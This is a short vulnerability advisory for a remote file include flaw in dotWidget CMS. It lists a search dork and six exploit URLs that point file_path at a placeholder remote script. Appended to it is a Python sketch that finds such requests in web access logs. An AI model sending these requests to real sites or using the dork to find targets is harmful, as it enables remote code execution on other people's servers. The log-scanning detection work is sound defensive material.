Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]
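
Detection sketch for the request pattern listed above, added here as an example and not part of the original advisory: it scans web access log lines for requests to the six listed scripts whose file_path parameter carries a URL scheme, protocol-relative or UNC prefix instead of a local path. The combined log format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths the advisory lists as taking file_path.
AFFECTED = (
    "/index.php", "/feedback.php", "/printfriendly.php",
    "/includes/common.inc", "/includes/nav.inc",
    "/admin/dotwidgetc_config.php",
)
# URL scheme, protocol-relative or UNC prefix: not a local relative path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Request target inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2006:10:01:02 +0000] "GET /index.php?file_path=http://www.yourspace.com/yourscript.php? HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Jun/2006:10:01:09 +0000] "GET /cms/includes/nav.inc?file_path=http%3A%2F%2Fwww.yourspace.com%2Fyourscript.php%3F HTTP/1.1" 200 128',
    '198.51.100.4 - - [05/Jun/2006:10:02:30 +0000] "GET /printfriendly.php?file_path=includes/ HTTP/1.1" 200 900',
    '198.51.100.4 - - [05/Jun/2006:10:02:41 +0000] "GET /about.php?file_path=http://host.example/x HTTP/1.1" 404 0',
]


def flag_remote_file_path(line):
    """Return the decoded file_path value if the log line is a hit, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Normalise the path so /cms//Index.PHP still matches the list.
    path = re.sub(r"/+", "/", unquote(url.path)).lower()
    if not path.endswith(AFFECTED):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        value = unquote(value)
        if key.lower() == "file_path" and REMOTE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, file_path_value) for every suspicious request."""
    checked = ((n, flag_remote_file_path(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in checked if v is not None]


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: remote file_path value {value!r}")
```

A hit only shows that the request was made; the HTTP status and the server's outbound connections at that time indicate whether the include was actually attempted by the application.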